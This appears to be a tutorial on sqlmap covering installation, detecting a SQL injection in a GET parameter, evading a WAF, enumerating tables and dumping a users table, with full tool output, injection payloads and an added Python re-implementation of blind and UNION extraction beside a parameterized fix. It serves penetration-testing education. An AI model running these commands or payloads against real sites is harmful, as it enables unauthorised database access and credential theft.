What is SQLmap?
sqlmap is an open-source, Python-based tool, which means it runs on any system with a Python interpreter. We still prefer Linux: it simply makes it easier to get things done, and most distributions ship Python already.
sqlmap is used in penetration testing to detect and exploit SQL injection flaws. It automates both halves of the job, finding the injectable parameter and then exploiting it, and with enough privileges on the back-end it can take you from a single vulnerable parameter to access to the target's database server.
Contents:
- Install SQLmap
- HTTP GET
- Getting blocked by WAF
- Database Tables
- Dump the data
How to Install SQLmap?
Step 1: Get a Linux based operating system or Windows
If you are running sqlmap on Windows with Python, make sure Python is installed and skip to the next step. Otherwise get a Linux system: boot your Linux desktop, or install a Linux virtual machine (Ubuntu or Kali recommended) on Windows under VirtualBox, VMware or Parallels.
If Microsoft Windows is your main system, running Ubuntu (or Kali Linux) in a virtual machine is the convenient and simple choice. You can then play with sqlmap, nmap, nikto and thousands of other tools.
Step 2: SQLmap Installation
sqlmap runs on Python 2.6, 2.7 and 3.x. Python 2 is end-of-life, so on a current distribution install Python 3 (Kali already ships both Python 3 and a packaged sqlmap).
Linux users:
sudo apt-get install python3
Windows users:
Download Python from python.org.
Linux users:
Now all you need to do is clone the repository from GitHub and start testing.
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
Cloning into 'sqlmap-dev'...
remote: Counting objects: 633, done.
remote: Compressing objects: 100% (602/602), done.
remote: Total 633 (delta 170), reused 171 (delta 20), pack-reused 0
Receiving objects: 100% (633/633), 7.17 MiB | 2.44 MiB/s, done.
Resolving deltas: 100% (170/170), done.
Windows users:
Download the latest zip from https://github.com/sqlmapproject/sqlmap and unpack it.
Now change into the directory you just created and run the script.
~$ cd sqlmap-dev
Type this on your machine:
python sqlmap.py
kali:~/sqlmap-dev$ python sqlmap.py
Usage: python sqlmap.py [options]
sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --list-tampers, --wizard, --update, --purge-output or --dependencies),
use -h for basic or -hh for advanced help
If you do not see the output above, make sure Python is working (python -V prints the version) and that you are in the right directory. Now let's move further.
To get the full list of options, run python sqlmap.py -h
To show the advanced help and all options, run python sqlmap.py -hh
Running SQLmap:
Simple HTTP GET based test:
In this test we point sqlmap at a URL with one GET parameter (?id=5). sqlmap will probe that id parameter with its different SQL injection techniques (boolean-based blind, error-based, time-based blind, UNION query and so on).
python sqlmap.py -u 'http://example.com/page.php?id=5'
In the output you can see the individual tests run against the parameter. sqlmap asks a few questions along the way; answer them, or add --batch to accept the defaults non-interactively. Only run this against a target you are authorised to test.
___
__H__
___ ___[']_____ ___ ___
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 12:55:56
[12:55:56] [INFO] testing connection to the target URL
[12:55:57] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[12:55:58] [INFO] testing if the target URL content is stable
[12:55:58] [INFO] target URL content is stable
[12:55:58] [INFO] testing if GET parameter 'id' is dynamic
[12:55:58] [INFO] confirming that GET parameter 'id' is dynamic
[12:55:59] [INFO] GET parameter 'id' is dynamic
[12:55:59] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:56:00] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:56:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:56:18] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="hac")
[12:56:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:56:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 53 HTTP(s) requests
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 561=561
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6630 UNION ALL SELECT NULL,CONCAT(0x7178786271,0x7434e597a45536f5a4c695273427857546c7554854574c4f5a534f587368725142615a54456256,0x716b767a71),NULL-- mIJj
---
[12:56:52] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.15
back-end DBMS: MySQL >= 5.0.12
[12:56:52] [INFO] fetched data logged to text files under '/home/example/.sqlmap/output/example'
[*] shutting down at 12:56:
If you are getting blocked by a Web Application Firewall
sqlmap's default User-Agent header names the tool, so many WAFs block it on sight. Try a different user agent than the default with the --random-agent option, like this:
python sqlmap.py -u "http://example.com/page.php?id=5" --random-agent
If requests are still being dropped, sqlmap can also rewrite its payloads with tamper scripts (--tamper, see --list-tampers) and slow down with --delay. Keep in mind that every blocked request is also an alert on the defender's side, so make sure the noise is within your agreed scope.
Fetch the Database Tables
sqlmap can be used to test and exploit SQL injection, doing things such as extracting data from databases, updating tables, and even popping shells on remote hosts if all the ducks are in a row.
Let's retrieve the tables from the database using the SQL injection vulnerability we confirmed above. As you will see in the output below, we can continue working against the target without retesting the vulnerability: sqlmap stores what it learned about the site in its session file and resumes from there.
To retrieve data we simply add an option to the previous command. By adding --tables we ask it to enumerate all the tables.
Kali@ok:~/sqlmap-dev$ python sqlmap.py -u 'http://mytestsite.com/page.php?id=5' --tables
(sqlmap banner and legal disclaimer, as above)
[*] starting at 12:59:04
[12:59:04] [INFO] resuming back-end DBMS 'mysql'
[12:59:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 9561=9561
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6630 UNION ALL SELECT NULL,CONCAT(0x7178786271,0x79434e597a45536f5a4c695273427857546c76554854574c4f5a534f587368725142615a54456256,0x716b767a71),NULL-- mIJj
---
[12:59:05] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12
Database: books
[8 tables]
+---------------------------------------+
| author                                |
| shoppingcarts                         |
| categories                            |
| featured                              |
| guestbook                             |
| pictures                              |
| products                              |
| users                                 |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
== snipped ==
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
[12:59:21] [INFO] fetched data logged to text files under '/home/elliot/.sqlmap/output/mytestsite.com'
[*] shutting down at 12:59:21
Dump the data
To get at the data we simply extend the command. Adding -T users focuses on the users table, where we may be able to find credentials, and adding
--dump
tells sqlmap to pull everything from that table: first the columns are enumerated, then the rows are dumped column by column. Add -D books as well if the same table name exists in more than one database.
Kali@ok:~/sqlmap-dev$ python sqlmap.py -u 'http://example.com/page.php?id=5' -T users --dump
(sqlmap banner {1.5.2.12#dev} and legal disclaimer, as above)
[*] starting at 12:59:04
[12:59:04] [INFO] resuming back-end DBMS 'mysql'
[12:59:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
--- SNIP ---
Database: books
Table: users
[1 entry]
+---------+----------------------------------+------+------+---------+----------------------+---------+
| name    | cart                             | pass | user | phone   | email                | address |
+---------+----------------------------------+------+------+---------+----------------------+---------+
| Kaliosk | 55207107sfefsff8e7f2fa5ef4fa00f6 | test | test | 4678654 | example@testtest.com |         |
+---------+----------------------------------+------+------+---------+----------------------+---------+
[13:08:36] [INFO] table 'users' dumped to CSV file '/home/fred/.sqlmap/output/example/dump/books/users.csv'
[13:08:36] [INFO] fetched data logged to text files under '/home/fred/.sqlmap/output/example'
[*] shutting down at 13:08:36
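To make the three sqlmap runs above concrete (the boolean-based blind hit on the GET parameter, the --tables enumeration and the -T users --dump), here is an added example that is not code from the original page or from the sqlmap project. It models the tutorial's page.php?id=5 target with an in-memory SQLite database and re-implements the logic by hand: the 'AND boolean-based blind' check behind the --string="hac" hit, the UNION column-count probe, table enumeration and a table dump. The UNION payloads wrap values in the same delimiters as the page's CONCAT(0x7178786271, ..., 0x716b767a71) payload, which decode to 'qxxbq' and 'qkvzq'. Assumptions: the schema and rows are constructed for the example, SQLite's sqlite_master and pragma_table_info() stand in for MySQL's information_schema, and the simulated page prints 'error' on a SQL error. The hardened safe_page shows the fix, a bound parameter, and the same probes fail against it.

```python
"""Added example, not from the original page or from sqlmap: a stand-in for
the vulnerable page.php?id=5 target plus hand-rolled versions of the checks
sqlmap ran above.  Database contents are constructed; SQLite's catalogue
(sqlite_master, pragma_table_info, needs SQLite >= 3.16) replaces
information_schema.  'qxxbq'/'qkvzq' are sqlmap's own hex delimiters."""
import re
import sqlite3
from urllib.parse import parse_qs, quote, urlparse

PRE, POST = "qxxbq", "qkvzq"            # 0x7178786271 / 0x716b767a71 from the page's payload
BASE = "http://example.com/page.php?id="

_conn = sqlite3.connect(":memory:")      # constructed target database
_conn.executescript("""
CREATE TABLE products (id INTEGER, name TEXT, price TEXT);
CREATE TABLE users (id INTEGER, user TEXT, pass TEXT, email TEXT);
INSERT INTO products VALUES (5, 'hacking guide', '12.00'), (6, 'nmap book', '20.00');
INSERT INTO users VALUES (1, 'test', 'test', 'example@testtest.com');
""")


def _param(url, name="id"):
    return parse_qs(urlparse(url).query).get(name, [""])[0]


def _render(rows):
    return "<html><ul>" + "".join(f"<li>{a} {b}</li>" for a, b in rows) + "</ul></html>"


def vulnerable_page(url):
    """The tutorial's target: the id value is concatenated straight into SQL."""
    sql = f"SELECT name, price FROM products WHERE id={_param(url)}"
    try:
        return _render(_conn.execute(sql).fetchall())
    except sqlite3.Error:
        return "<html>error</html>"       # what sqlmap's error-based tests key off


def safe_page(url):
    """Hardened form: the value is bound as a parameter, so it is data, not SQL."""
    sql = "SELECT name, price FROM products WHERE id=?"
    return _render(_conn.execute(sql, (_param(url),)).fetchall())


def boolean_blind_injectable(page, url, string):
    """'AND boolean-based blind' with --string: the marker must survive a true
    condition and vanish under a false one; an unstable page is not judged."""
    original = page(url)
    if original != page(url) or string not in original:
        return False
    true_page = page(url + quote(" AND 1=1"))
    false_page = page(url + quote(" AND 1=2"))
    return string in true_page and string not in false_page


def union_column_count(page, base, max_cols=20):
    """'Generic UNION query (NULL) - 1 to 20 columns': grow the NULL list until
    the UNION parses and our marker lands in the response."""
    for n in range(1, max_cols + 1):
        cols = [f"'{PRE}{POST}'"] + ["NULL"] * (n - 1)
        if PRE + POST in page(base + quote("-1 UNION ALL SELECT " + ",".join(cols))):
            return n
    return None


def union_extract(page, base, ncols, expr, source):
    """Pull expr's values out of `source` through the UNION, one per row,
    delimited exactly like sqlmap's CONCAT(0x..., value, 0x...) payload."""
    cols = [f"'{PRE}'||{expr}||'{POST}'"] + ["NULL"] * (ncols - 1)
    payload = f"-1 UNION ALL SELECT {','.join(cols)} FROM {source}"
    return re.findall(f"{PRE}(.*?){POST}", page(base + quote(payload)))


def enumerate_tables(page, base, ncols):
    """--tables, read from SQLite's catalogue instead of information_schema."""
    return union_extract(page, base, ncols, "name", "sqlite_master WHERE type='table'")


def dump_table(page, base, ncols, table):
    """-T <table> --dump: enumerate the columns first, then pull every row."""
    columns = union_extract(page, base, ncols, "name", f"pragma_table_info('{table}')")
    rows = union_extract(page, base, ncols, "||'|'||".join(columns), table)
    return [dict(zip(columns, row.split("|"))) for row in rows]


if __name__ == "__main__":
    for page in (vulnerable_page, safe_page):
        print(page.__name__, "injectable:", boolean_blind_injectable(page, BASE + "5", "hac"))
    n = union_column_count(vulnerable_page, BASE)
    print("columns:", n, "tables:", enumerate_tables(vulnerable_page, BASE, n))
    print("users:", dump_table(vulnerable_page, BASE, n, "users"))
```

The marker string matters: "hac" comes from a product name in the constructed data, which is why a true condition keeps it on the page and a false one removes it, the same reasoning sqlmap reports as --string="hac". Against safe_page the bound parameter never matches a row, so neither the blind check nor the UNION probe succeeds.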
SQLmap Tips:
Verbose output
When testing for SQL injection it is often necessary to look at the raw requests and responses to understand why a test is failing, and raising sqlmap's verbosity with -v is the quickest way to do that.
-v 3 shows the payloads being injected, -v 4 adds the HTTP requests, -v 5 also shows the HTTP response headers, and -v 6 prints the full HTTP response body. This can get very noisy, but sometimes you need to see exactly what is happening. Routing the traffic through an intercepting proxy with --proxy is the other common way to watch it.
Did you get Database Credentials?
This tip lets you connect to the database directly and dump users, databases or tables without the web application in between. The good part is that you do not have to remember the SQL syntax of that particular DBMS or have a client installed: sqlmap does the heavy lifting, acting as a database client. Pass the connection string to the -d option instead of -u, in one of these forms:
Database connection strings:
MySQL, Oracle, Microsoft SQL Server, PostgreSQL...
DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME
SQLite, Microsoft Access
DBMS://DATABASE_FILEPATH
A direct connection needs the matching Python driver for that DBMS installed; sqlmap tells you which library is missing if it cannot load it.
ALL THE COMMANDS WE USED ABOVE:
- git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
- cd sqlmap-dev
- python sqlmap.py
- python sqlmap.py -h
- python sqlmap.py -hh
- python sqlmap.py -u 'http://example.com/page.php?id=5'
- python sqlmap.py -u "http://example.com/page.php?id=5" --random-agent
- python sqlmap.py -u 'http://mytestsite.com/page.php?id=5' --tables